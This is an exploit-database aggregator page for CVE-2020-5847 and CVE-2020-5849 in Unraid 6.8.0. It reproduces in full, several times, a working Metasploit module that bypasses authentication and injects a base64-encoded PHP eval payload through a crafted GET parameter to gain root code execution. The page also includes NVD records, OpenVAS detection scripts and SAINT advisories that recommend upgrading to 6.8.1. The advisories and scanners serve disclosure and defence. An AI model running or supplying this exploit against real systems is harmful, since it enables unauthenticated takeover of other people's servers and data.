Search...

Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)

2020-04-20T00:00:00

ID EDB-ID:48353
Type exploitdb
Reporter Exploit-DB
Modified 2020-04-20T00:00:00

Description

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  Rank = ExcellentRanking
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' =&gt; 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
        'Description' =&gt; %q{
          This module exploits two vulnerabilities affecting Unraid 6.8.0.
          An authentication bypass is used to gain access to the administrative
          interface, and an insecure use of the extract PHP function can be abused
          for arbitrary code execution as root.
        },
        'Author' =&gt;
          [
            'Nicolas CHATELAIN &lt;n.chatelain@sysdream.com&gt;'
          ],
        'References' =&gt;
          [
            [ 'CVE', '2020-5847' ],
            [ 'CVE', '2020-5849' ],
            [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
            [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
          ],
        'License' =&gt; MSF_LICENSE,
        'Platform' =&gt; ['php'],
        'Privileged' =&gt; true,
        'Arch' =&gt; ARCH_PHP,
        'Targets' =&gt;
          [
            [ 'Automatic', {}]
          ],
        'DefaultTarget' =&gt; 0,
        'DisclosureDate' =&gt; 'Feb 10 2020'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
      ]
    )
  end

  def check
    res = send_request_cgi(
      'uri' =&gt; normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
      'method' =&gt; 'GET'
    )

    unless res
      return CheckCode::Unknown('Connection failed')
    end

    unless res.code == 200
      return CheckCode::Safe('Unexpected reply')
    end

    /\sVersion:\s(?&lt;version&gt;[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})&nbsp;/ =~ res.body

    if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
      return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
    end

    CheckCode::Safe
  end

  def exploit
    begin
      vprint_status('Sending exploit code')
      res = send_request_cgi(
        'uri' =&gt; normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
        'method' =&gt; 'GET',
        'encode_params' =&gt; false,
        'vars_get' =&gt;
        {
          'path' =&gt; 'x',
          'site[x][text]' =&gt; Rex::Text.uri_encode("&lt;?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?&gt;", 'hex-normal')
        }
      )

      if res.nil?
        print_good('Request timed out, OK if running a non-forking/blocking payload...')
      elsif res.code == 302
        fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
      else
        print_warning("Unexpected response code #{res.code}, please check your payload.")
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end

JSON Vulners Source

Initial Source

{"id": "EDB-ID:48353", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)", "description": "", "published": "2020-04-20T00:00:00", "modified": "2020-04-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.exploit-db.com/exploits/48353", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "lastseen": "2020-04-20T11:44:02", "viewCount": 55, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-5847", "CVE-2020-5849"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:157275"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143518", "OPENVAS:1361412562310143519"]}, {"type": "zdt", "idList": ["1337DAY-ID-34260"]}, {"type": "saint", "idList": ["SAINT:74C0293BF5130A596F2DA5BDCEF8CDFC", "SAINT:12D923E478A5F12917E694F4DC11168D"]}], "modified": "2020-04-20T11:44:02", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2020-04-20T11:44:02", "rev": 2}, "vulnersScore": 6.7}, "sourceHref": "https://www.exploit-db.com/download/48353", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::PhpEXE\r\n\r\n Rank = ExcellentRanking\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities affecting Unraid 6.8.0.\r\n An authentication bypass is used to gain access to the administrative\r\n interface, and an insecure use of the extract PHP function can be abused\r\n for arbitrary code execution as root.\r\n },\r\n 'Author' =>\r\n [\r\n 'Nicolas CHATELAIN <n.chatelain@sysdream.com>'\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2020-5847' ],\r\n [ 'CVE', '2020-5849' ],\r\n [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],\r\n [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php'],\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 10 2020'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET'\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Connection failed')\r\n end\r\n\r\n unless res.code == 200\r\n return CheckCode::Safe('Unexpected reply')\r\n end\r\n\r\n /\\sVersion:\\s(?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2}) / =~ res.body\r\n\r\n if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')\r\n return CheckCode::Appears(\"Unraid version #{version} appears to be vulnerable\")\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n begin\r\n vprint_status('Sending exploit code')\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET',\r\n 'encode_params' => false,\r\n 'vars_get' =>\r\n {\r\n 'path' => 'x',\r\n 'site[x][text]' => Rex::Text.uri_encode(\"<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>\", 'hex-normal')\r\n }\r\n )\r\n\r\n if res.nil?\r\n print_good('Request timed out, OK if running a non-forking/blocking payload...')\r\n elsif res.code == 302\r\n fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')\r\n else\r\n print_warning(\"Unexpected response code #{res.code}, please check your payload.\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\r\n end\r\n end\r\nend", "osvdbidlist": []}

{"cve": [{"lastseen": "2021-02-02T07:37:10", "description": "Unraid through 6.8.0 allows Remote Code Execution.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-16T18:15:00", "title": "CVE-2020-5847", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5847"], "modified": "2020-04-17T17:15:00", "cpe": ["cpe:/a:unraid:unraid:6.8.0"], "id": "CVE-2020-5847", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5847", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:unraid:unraid:6.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:37:10", "description": "Unraid 6.8.0 allows authentication bypass.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-03-16T18:15:00", "title": "CVE-2020-5849", "type": "cve", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5849"], "modified": "2020-04-17T17:15:00", "cpe": ["cpe:/a:unraid:unraid:6.8.0"], "id": "CVE-2020-5849", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5849", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:unraid:unraid:6.8.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-12T15:09:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "description": "Unraid OS is prone to a remote code execution vulnerability over the Web UI.", "modified": "2020-05-08T00:00:00", "published": "2020-02-14T00:00:00", "id": "OPENVAS:1361412562310143519", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143519", "type": "openvas", "title": "Unraid OS < 6.8.1 RCE Vulnerability", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/o:unraid:unraid\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143519\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-14 08:15:48 +0000 (Fri, 14 Feb 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2020-5847\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Unraid OS < 6.8.1 RCE Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_unraid_http_detect.nasl\");\n script_mandatory_keys(\"unraid/detected\");\n script_require_ports(\"Services/www\", 80, 443);\n\n script_tag(name:\"summary\", value:\"Unraid OS is prone to a remote code execution vulnerability over the Web UI.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"affected\", value:\"Unraid OS version 6.8.0 and prior.\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.8.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"PHP Version\", check_header: TRUE, extra_check: \"PHP API\")) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T15:09:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "description": "The Web UI of Unraid OS is prone to an authentication bypass vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2020-02-14T00:00:00", "id": "OPENVAS:1361412562310143518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310143518", "type": "openvas", "title": "Unraid OS 6.8.0 Authentication Bypass Vulnerability", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/o:unraid:unraid\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.143518\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-14 07:25:48 +0000 (Fri, 14 Feb 2020)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2020-5849\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Unraid OS 6.8.0 Authentication Bypass Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_unraid_http_detect.nasl\");\n script_mandatory_keys(\"unraid/detected\");\n script_require_ports(\"Services/www\", 80, 443);\n\n script_tag(name:\"summary\", value:\"The Web UI of Unraid OS is prone to an authentication bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP GET request and checks the response.\");\n\n script_tag(name:\"insight\", value:\"In order to check if a web page requires authentication, unraid uses a\n auth_request.php file that contains a whitelist which uses the strpos function for comparing strings. The\n whitelist can therefore be bypassed by appending additional characters to an entry in the whitelist.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker might get full control over the host.\");\n\n script_tag(name:\"affected\", value:\"Unraid OS version 6.8.0.\");\n\n script_tag(name:\"solution\", value:\"Update to version 6.8.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\n# Already no authentication in place\nif (get_kb_item(\"unraid/http/\" + port + \"/noauth\"))\n exit(0);\n\nurl = dir + \"/webGui/images/green-on.png/Settings\";\n\nif (http_vuln_check(port: port, url: url, pattern: '\"PanelText\">Date and Time',\n extra_check: '\"PanelText\">Disk Settings', check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-07-19T20:05:30", "description": "This Metasploit module exploits two vulnerabilities affecting Unraid 6.8.0. An authentication bypass is used to gain access to the administrative interface, and an insecure use of the extract PHP function can be abused for arbitrary code execution as root.", "edition": 1, "published": "2020-04-18T00:00:00", "title": "Unraid 6.8.0 Authentication Bypass / Arbitrary Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "modified": "2020-04-18T00:00:00", "id": "1337DAY-ID-34260", "href": "https://0day.today/exploit/description/34260", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::PhpEXE\r\n\r\n Rank = ExcellentRanking\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',\r\n 'Description' => %q{\r\n This module exploits two vulnerabilities affecting Unraid 6.8.0.\r\n An authentication bypass is used to gain access to the administrative\r\n interface, and an insecure use of the extract PHP function can be abused\r\n for arbitrary code execution as root.\r\n },\r\n 'Author' =>\r\n [\r\n 'Nicolas CHATELAIN <[email\u00a0protected]>'\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2020-5847' ],\r\n [ 'CVE', '2020-5849' ],\r\n [ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],\r\n [ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['php'],\r\n 'Privileged' => true,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 10 2020'\r\n )\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET'\r\n )\r\n\r\n unless res\r\n return CheckCode::Unknown('Connection failed')\r\n end\r\n\r\n unless res.code == 200\r\n return CheckCode::Safe('Unexpected reply')\r\n end\r\n\r\n /\\sVersion:\\s(?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2})&nbps;/ =~ res.body\r\n\r\n if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')\r\n return CheckCode::Appears(\"Unraid version #{version} appears to be vulnerable\")\r\n end\r\n\r\n CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n begin\r\n vprint_status('Sending exploit code')\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),\r\n 'method' => 'GET',\r\n 'encode_params' => false,\r\n 'vars_get' =>\r\n {\r\n 'path' => 'x',\r\n 'site[x][text]' => Rex::Text.uri_encode(\"<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>\", 'hex-normal')\r\n }\r\n )\r\n\r\n if res.nil?\r\n print_good('Request timed out, OK if running a non-forking/blocking payload...')\r\n elsif res.code == 302\r\n fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')\r\n else\r\n print_warning(\"Unexpected response code #{res.code}, please check your payload.\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\")\r\n end\r\n end\r\nend\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34260"}], "packetstorm": [{"lastseen": "2020-04-21T06:58:40", "description": "", "published": "2020-04-17T00:00:00", "type": "packetstorm", "title": "Unraid 6.8.0 Authentication Bypass / Arbitrary Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5849", "CVE-2020-5847"], "modified": "2020-04-17T00:00:00", "id": "PACKETSTORM:157275", "href": "https://packetstormsecurity.com/files/157275/Unraid-6.8.0-Authentication-Bypass-Arbitrary-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::PhpEXE \n \nRank = ExcellentRanking \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution', \n'Description' => %q{ \nThis module exploits two vulnerabilities affecting Unraid 6.8.0. \nAn authentication bypass is used to gain access to the administrative \ninterface, and an insecure use of the extract PHP function can be abused \nfor arbitrary code execution as root. \n}, \n'Author' => \n[ \n'Nicolas CHATELAIN <n.chatelain@sysdream.com>' \n], \n'References' => \n[ \n[ 'CVE', '2020-5847' ], \n[ 'CVE', '2020-5849' ], \n[ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ], \n[ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ] \n], \n'License' => MSF_LICENSE, \n'Platform' => ['php'], \n'Privileged' => true, \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Automatic', {}] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 10 2020' \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/']) \n] \n) \nend \n \ndef check \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), \n'method' => 'GET' \n) \n \nunless res \nreturn CheckCode::Unknown('Connection failed') \nend \n \nunless res.code == 200 \nreturn CheckCode::Safe('Unexpected reply') \nend \n \n/\\sVersion:\\s(?<version>[\\d]{1,2}\\.[\\d]{1,2}\\.[\\d]{1,2}) / =~ res.body \n \nif version && Gem::Version.new(version) == Gem::Version.new('6.8.0') \nreturn CheckCode::Appears(\"Unraid version #{version} appears to be vulnerable\") \nend \n \nCheckCode::Safe \nend \n \ndef exploit \nbegin \nvprint_status('Sending exploit code') \nres = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'), \n'method' => 'GET', \n'encode_params' => false, \n'vars_get' => \n{ \n'path' => 'x', \n'site[x][text]' => Rex::Text.uri_encode(\"<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>\", 'hex-normal') \n} \n) \n \nif res.nil? \nprint_good('Request timed out, OK if running a non-forking/blocking payload...') \nelsif res.code == 302 \nfail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.') \nelse \nprint_warning(\"Unexpected response code #{res.code}, please check your payload.\") \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Could not connect to the web service\") \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157275/unraid_auth_bypass_exec.rb.txt"}], "saint": [{"lastseen": "2020-05-03T02:46:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5847"], "description": "Added: 04/30/2020 \nCVE: [CVE-2020-5847](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847>) \n\n\n### Background\n\n[Unraid](<https://unraid.net/>) is a network-attached storage operating system. It runs a web-based graphical user interface (webGui) written in PHP. \n\n### Problem\n\nThe Unraid webGui uses the PHP `**extract**` function to load all GET parameters into the application as variables, allowing a remote user to control any program variable, leading to command execution. \n\n### Resolution\n\nUpgrade to [Unraid](<https://unraid.net/>) 6.8.1 or higher. \n\n### References\n\n<https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/> \n \n\n", "edition": 1, "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "SAINT:12D923E478A5F12917E694F4DC11168D", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/unraid_webgui_extract", "title": "Unraid webGui remote code execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-06T00:57:42", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-5847"], "description": "Added: 04/30/2020 \nCVE: [CVE-2020-5847](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847>) \n\n\n### Background\n\n[Unraid](<https://unraid.net/>) is a network-attached storage operating system. It runs a web-based graphical user interface (webGui) written in PHP. \n\n### Problem\n\nThe Unraid webGui uses the PHP `**extract**` function to load all GET parameters into the application as variables, allowing a remote user to control any program variable, leading to command execution. \n\n### Resolution\n\nUpgrade to [Unraid](<https://unraid.net/>) 6.8.1 or higher. \n\n### References\n\n<https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/> \n \n\n", "edition": 1, "modified": "2020-04-30T00:00:00", "published": "2020-04-30T00:00:00", "id": "SAINT:74C0293BF5130A596F2DA5BDCEF8CDFC", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/unraid_webgui_extract", "title": "Unraid webGui remote code execution", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}